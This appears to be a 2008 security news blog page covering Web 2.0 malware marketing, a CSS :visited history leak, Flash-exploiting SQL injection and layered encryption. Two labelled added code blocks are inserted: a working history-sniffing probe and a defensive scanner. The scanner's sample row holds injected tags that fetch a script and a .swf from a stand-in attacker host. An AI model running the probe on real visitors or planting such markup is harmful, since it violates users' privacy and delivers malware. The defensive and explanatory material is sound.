Web 2.0 Sites a Thriving Marketplace for Malware

May 30, 2008 – 5:49 AM

A wiry young man with his head shaved and wearing a tank top points a handgun straight at the camera in a disturbing YouTube video. The man wears what appears to be a wedding ring, and he gazes vacantly away from the viewer.

Though it’s an odd image for an advertisement, this video isn’t promoting your average company. It’s from a not-so-underground Albanian hacker group that’s out to make a name for themselves in the thriving world of malware and computer crime. Besides the shot of the gunman, the video showcases images of a computer screen, a table loaded with foreign currency, and plenty of links to the group’s Web site.

Malware is big business, and groups like the Albanian hackers are trying to cash in, using the latest Web 2.0 tools: social networking profiles, blogs, and other publicly available media and Web pages. The digital desperados are moving more and more into wide-scale advertising and brand building on public sites and networks to grow their underground trade.

Read the rest of the story…

CSS exploit allows detection of social site use

May 29, 2008 – 1:23 PM

Web developer Aza Raskin knows we visit Digg, Del.icio.us, Reddit and Facebook without even having to ask.

No, he isn’t employing privacy-violating hackery, but he is exploiting a “cute” information leak in CSS, which traditionally displays visited links differently from those that have yet to be visited. By loading a list of social-site URLs in an iframe and checking which render purple (visited) rather than blue (not visited), the script can infer which sites a user actually uses and prompt them to submit a story or blog entry only to those.

Raskin has wrapped this functionality in a script called SocialHistory.js.

By employing this script on a blog, you can avoid showing users the traditional mass of social site icons, only a few of which they probably visit. In addition to the large list of social sites checked by SocialHistory — this includes more than 20 of the most-popular names — you can add additional ones that might be specific to your needs. For instance, you can check to see if the user has visited other blogs you author.

Raskin says while his script isn’t perfect, “it does get you 80% of the way there.” He also says there is little chance the bug — it’s documented in Bugzilla — will be fixed since it’s a core feature of the Web browser.
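The probe the story describes, as an added example that is not Raskin’s SocialHistory.js: the decision logic is kept separate from the DOM so it can be driven by a real document or by a constructed browser model, and a control check tells you whether the browser in front of you still leaks `:visited` at all. The stylesheet colours, the `domColorOf` adapter and the two browser models are assumptions made for the example.

```javascript
// Added example, not Raskin's SocialHistory.js: the :visited colour probe the
// story describes, with the decision logic kept separate from the DOM so it can
// be driven by a real document or by a constructed browser model.

// Assumed stylesheet on the probing page: a:link {color: blue}  a:visited {color: purple}
const UNVISITED = "rgb(0, 0, 255)";
const VISITED = "rgb(128, 0, 128)";

// Classify each URL by the colour the browser reports for a link to it.
// computedColorOf(url) is an adapter returning the rendered link colour.
function inferVisited(urls, computedColorOf) {
  const result = { visited: [], unvisited: [], unknown: [] };
  for (const url of urls) {
    const color = computedColorOf(url);
    if (color === VISITED) result.visited.push(url);
    else if (color === UNVISITED) result.unvisited.push(url);
    else result.unknown.push(url); // stylesheet missing, or colour masked
  }
  return result;
}

// Control check: probe a URL this browser has certainly visited (the page
// itself). If even that reports UNVISITED, the browser is masking :visited
// from scripts and nothing inferVisited returns on it can be trusted.
function browserLeaksHistory(computedColorOf, knownVisitedUrl) {
  return computedColorOf(knownVisitedUrl) === VISITED;
}

// Real-browser adapter: render an <a> to the URL and read back its colour.
// Firefox 4+ and Chrome 9+ deliberately report the a:link colour here, so on
// those browsers the control check above fails and the leak is closed.
function domColorOf(url) {
  const a = document.createElement("a");
  a.href = url;
  document.body.appendChild(a);
  const color = getComputedStyle(a).color;
  a.remove();
  return color;
}

// Constructed models for running offline: a 2008-era browser that exposes
// history through :visited, and a hardened one that never does.
function leakyBrowser(visitedSet) {
  return (url) => (visitedSet.has(url) ? VISITED : UNVISITED);
}
function hardenedBrowser() {
  return () => UNVISITED;
}
```

In a page, call `inferVisited(urls, domColorOf)` only after `browserLeaksHistory(domColorOf, location.href)` returns true; otherwise the browser is masking the style and every site will come back as unvisited.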

Read the rest of this story…

Built-in Windows Command-Line Security Tools

May 28, 2008 – 7:59 PM

Links:

Built-in Windows commands to determine if a system has been hacked

More built-in Windows commands for system analysis

New SQL Injection Attacks Exploit Adobe Flash Flaw

May 28, 2008 – 7:52 PM

Mass SQL injection attack, take four: Yet another wave of SQL injection attacks is exploiting an Adobe Flash vulnerability, and it appears to come from the same series of attacks originating from China.

The intent, as in previous attacks, has been to steal online gamers’ password credentials. But given the persistence and scope of the attacks over the past few months, researchers worry that World of Warcraft players and other gaming jocks aren’t the only users at risk in these stubborn Website attacks.

“Even if a user isn’t online-gaming, he or she could become a victim of the attack,” says Ben Greenbaum, senior research manager at Symantec Security Response. “The hostile portion of this content lives on attacker-controlled servers… and they could change their payload at any time,” injecting keyloggers or other more malicious programs to steal personal information, for instance.

Ivan Macalintal, senior research engineer for Trend Micro, agrees. “The payload… could be dynamically changed at any time [by] the remote attacker. If they want to change it to other password stealers, it would be potentially damaging to other users” besides online gamers.

The latest attack works like this: A vulnerable Website is first compromised with a SQL injection attack, and the malicious script that’s injected points a visitor’s browser to a malicious URL that carries ShockWave (SWF) files that exploit the Adobe Flash bug (aka CVE-2007-0071), according to Trend Micro. Then, unbeknownst to the user, his or her vulnerable machine downloads the malicious file, which researchers say is either spyware to steal credentials or some type of Trojan dropper to download other malicious files.
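A defender’s response to the chain above, as an added example that is not from the story or the researchers it quotes: a scanner that audits a site’s stored page content (or database text columns) for the kind of reference the injection leaves behind, flagging script, iframe, embed and object references that point off-site and any reference to a .swf file. The allowlisted hosts, the site base URL and the sample row are constructed for the example.

```javascript
// Added example, not from the story or the researchers it quotes: a scanner
// for the injected reference the chain above leaves in a compromised site's
// pages or database text columns. It flags script/iframe/embed/object
// references that point off-site, and any reference to a .swf file, so stored
// content can be audited for the injection.

// Hosts the site legitimately loads content from (assumed allowlist).
const TRUSTED_HOSTS = new Set(["www.example-store.test", "cdn.example-store.test"]);
const SITE_BASE = "http://www.example-store.test/"; // for resolving relative URLs

// Tag/attribute pairs through which injected markup pulls in remote content.
const REFERENCE_PATTERNS = [
  /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi,
  /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi,
  /<embed\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi,
  /<object\b[^>]*\bdata\s*=\s*["']?([^"'\s>]+)/gi,
];

// Returns [{ tag, url, reasons }] for every suspicious reference in html.
function findInjectedReferences(html, trustedHosts = TRUSTED_HOSTS) {
  const findings = [];
  for (const pattern of REFERENCE_PATTERNS) {
    for (const match of html.matchAll(pattern)) {
      const tag = match[0].slice(1).split(/[\s>]/)[0].toLowerCase();
      const url = match[1];
      const reasons = [];
      let host = null;
      try {
        host = new URL(url, SITE_BASE).hostname;
      } catch {
        reasons.push("unparseable-url");
      }
      if (host !== null && !trustedHosts.has(host)) reasons.push("off-site-host");
      if (/\.swf(\?|#|$)/i.test(url)) reasons.push("flash-swf");
      if (reasons.length > 0) findings.push({ tag, url, reasons });
    }
  }
  return findings;
}

// Constructed sample: one product-description row after a mass SQL injection
// appended remote script and Flash references to it, next to a legitimate
// same-site script reference that must not be flagged.
const SAMPLE_ROW =
  '<p>Blue widget, 2 pack.</p>' +
  '<script src="/js/site.js"></script>' +
  '<script src=http://injected.example/b.js></script>' +
  '<embed src="http://injected.example/ex.swf" type="application/x-shockwave-flash">';
```

Run `findInjectedReferences` over every text column the site renders unescaped; a same-site .swf is reported with only the `flash-swf` reason so it can be reviewed rather than treated as an injection.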

Read the rest of this story…

When To Layer Encryption

May 28, 2008 – 7:36 PM

I used to joke about the client that once told me their management mandated “double encryption” on all financial information after a breach. In their case, they were encrypting their database and backup tapes. Not that there isn’t a valid reason to encrypt databases and backup tapes, but the way they were implementing it provided no additional security. Once those card numbers were encrypted in the DB, re-encrypting at the tape level added no value (this wasn’t a case where they were encrypting the tapes to protect information not already encrypted).

But if we go back to the Three Laws of Encryption, there are circumstances where you might consider multiple layers. The most common case is when we are encrypting for media protection, but also need to encrypt for separation of duties.

Full disk encryption is your best bet to protect yourself from information loss due to a lost or stolen laptop, but there are situations where FDE is not enough. It doesn’t protect content from multiple users on a system, say the sensitive financials on the CFO’s laptop from the lowly system administrator, nor does it protect content as it moves, say to a USB drive. File level encryption allows more granular options and protection in a wider range of circumstances. But since users are unreliable, and there are places (like virtual memory) where sensitive data can hide, file encryption doesn’t obviate the need for FDE (or an FDE-equivalent).

Thus file encryption is complementary to full drive encryption; each solves a different part of the data protection puzzle. With file encryption you can protect content as you move it off the laptop, protect it from other users (especially administrative users) on the same system, and encrypt data that’s shared across a team using group keys.

Read the rest of this story…